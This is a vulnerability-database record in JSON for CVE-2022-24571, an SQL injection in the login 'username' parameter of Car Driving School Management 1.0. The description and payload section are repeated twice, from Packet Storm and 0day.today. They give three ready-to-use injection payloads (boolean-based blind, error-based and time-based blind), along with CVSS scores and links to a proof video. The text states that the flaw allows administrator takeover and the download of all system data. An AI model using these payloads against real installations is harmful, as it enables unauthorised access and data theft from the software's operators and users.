Car Driving School Management 1.0 SQL Injection

2022-03-02T00:00:00

Description

{"id": "PACKETSTORM:166185", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Car Driving School Management 1.0 SQL Injection", "description": "", "published": "2022-03-02T00:00:00", "modified": "2022-03-02T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/166185/Car-Driving-School-Management-1.0-SQL-Injection.html", "reporter": "nu11secur1ty", "references": [], "cvelist": ["CVE-2022-24571"], "immutableFields": [], "lastseen": "2022-03-02T17:17:32", "viewCount": 132, "enchantments": {"backreferences": {"references": [{"type": "cve", "idList": ["CVE-2022-24571"]}, {"type": "zdt", "idList": ["1337DAY-ID-37442"]}]}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2022-24571"]}, {"type": "zdt", "idList": ["1337DAY-ID-37442"]}], "rev": 4}, "score": {"value": 6.2, "vector": "NONE"}, "vulnersScore": 6.2}, "_state": {"dependencies": 1646486614}, "_internal": {}, "sourceHref": "https://packetstormsecurity.com/files/download/166185/cdsm10-sql.txt", "sourceData": "`## Title: Car Driving School Management v1.0 SQLi \n## Author: nu11secur1ty \n## Date: 03.02.2022 \n## Vendor: https://www.sourcecodester.com/users/tips23 \n## Software: https://www.sourcecodester.com/php/15070/car-driving-school-management-system-phpoop-free-source-code.html \n## Reference: https://github.com/nu11secur1ty/CVE-mitre/blob/main/2022/CVE-2022-24571 \n \n## Description: \nThe `username` parameter on Car Driving School Management v1.0 appears \nto be vulnerable to SQL injection attacks. \nA single quote was submitted in the username parameter, and a database \nerror message was returned. \nTwo single quotes were then submitted and the error message disappeared. \nThe attacker can take administrator account control and also of all \naccounts on this system, also the malicious user can download all \ninformation about this system. \n \nStatus: CRITICAL \n \n[+] Payloads: \n \n```mysql \n \n--- \nParameter: username (POST) \nType: boolean-based blind \nTitle: OR boolean-based blind - WHERE or HAVING clause (NOT) \nPayload: username=DMdqCjGG' OR NOT 6823=6823-- yrqx&password=a5Y!f7m!O0 \n \nType: error-based \nTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or \nGROUP BY clause (FLOOR) \nPayload: username=DMdqCjGG' AND (SELECT 9746 FROM(SELECT \nCOUNT(*),CONCAT(0x71786b7671,(SELECT \n(ELT(9746=9746,1))),0x7171787a71,FLOOR(RAND(0)*2))x FROM \nINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- gzNl&password=a5Y!f7m!O0 \n \nType: time-based blind \nTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP) \nPayload: username=DMdqCjGG' AND (SELECT 9290 FROM \n(SELECT(SLEEP(5)))RWHi)-- vsyd&password=a5Y!f7m!O0 \n--- \n \n``` \n \n## Reproduce: \n[href](https://github.com/nu11secur1ty/CVE-mitre/blob/main/2022/CVE-2022-24571) \n \n## Proof and Exploit: \n[href](https://streamable.com/n9r8uk) \n \n`\n"}

{"cve": [{"lastseen": "2022-03-23T10:21:39", "description": "Car Driving School Management System v1.0 is affected by SQL injection in the login page. An attacker can use simple SQL login injection payload to get admin access.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-28T14:15:00", "type": "cve", "title": "CVE-2022-24571", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24571"], "modified": "2022-03-08T17:38:00", "cpe": ["cpe:/a:car_driving_school_management_system_project:car_driving_school_management_system:1.0"], "id": "CVE-2022-24571", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24571", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:car_driving_school_management_system_project:car_driving_school_management_system:1.0:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2022-03-08T22:03:17", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-02T00:00:00", "type": "zdt", "title": "Car Driving School Management 1.0 SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24571"], "modified": "2022-03-02T00:00:00", "id": "1337DAY-ID-37442", "href": "https://0day.today/exploit/description/37442", "sourceData": "## Title: Car Driving School Management v1.0 SQLi\n## Author: nu11secur1ty\n## Vendor: https://www.sourcecodester.com/users/tips23\n## Software: https://www.sourcecodester.com/php/15070/car-driving-school-management-system-phpoop-free-source-code.html\n## Reference: https://github.com/nu11secur1ty/CVE-mitre/blob/main/2022/CVE-2022-24571\n\n## Description:\nThe `username` parameter on Car Driving School Management v1.0 appears\nto be vulnerable to SQL injection attacks.\nA single quote was submitted in the username parameter, and a database\nerror message was returned.\nTwo single quotes were then submitted and the error message disappeared.\nThe attacker can take administrator account control and also of all\naccounts on this system, also the malicious user can download all\ninformation about this system.\n\nStatus: CRITICAL\n\n[+] Payloads:\n\n```mysql\n\n---\nParameter: username (POST)\n Type: boolean-based blind\n Title: OR boolean-based blind - WHERE or HAVING clause (NOT)\n Payload: username=DMdqCjGG' OR NOT 6823=6823-- yrqx&password=a5Y!f7m!O0\n\n Type: error-based\n Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or\nGROUP BY clause (FLOOR)\n Payload: username=DMdqCjGG' AND (SELECT 9746 FROM(SELECT\nCOUNT(*),CONCAT(0x71786b7671,(SELECT\n(ELT(9746=9746,1))),0x7171787a71,FLOOR(RAND(0)*2))x FROM\nINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- gzNl&password=a5Y!f7m!O0\n\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: username=DMdqCjGG' AND (SELECT 9290 FROM\n(SELECT(SLEEP(5)))RWHi)-- vsyd&password=a5Y!f7m!O0\n---\n\n```\n\n## Reproduce:\n[href](https://github.com/nu11secur1ty/CVE-mitre/blob/main/2022/CVE-2022-24571)\n\n## Proof and Exploit:\n[href](https://streamable.com/n9r8uk)\n", "sourceHref": "https://0day.today/exploit/37442", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}

Car Driving School Management 1.0 SQL Injection

Description

Related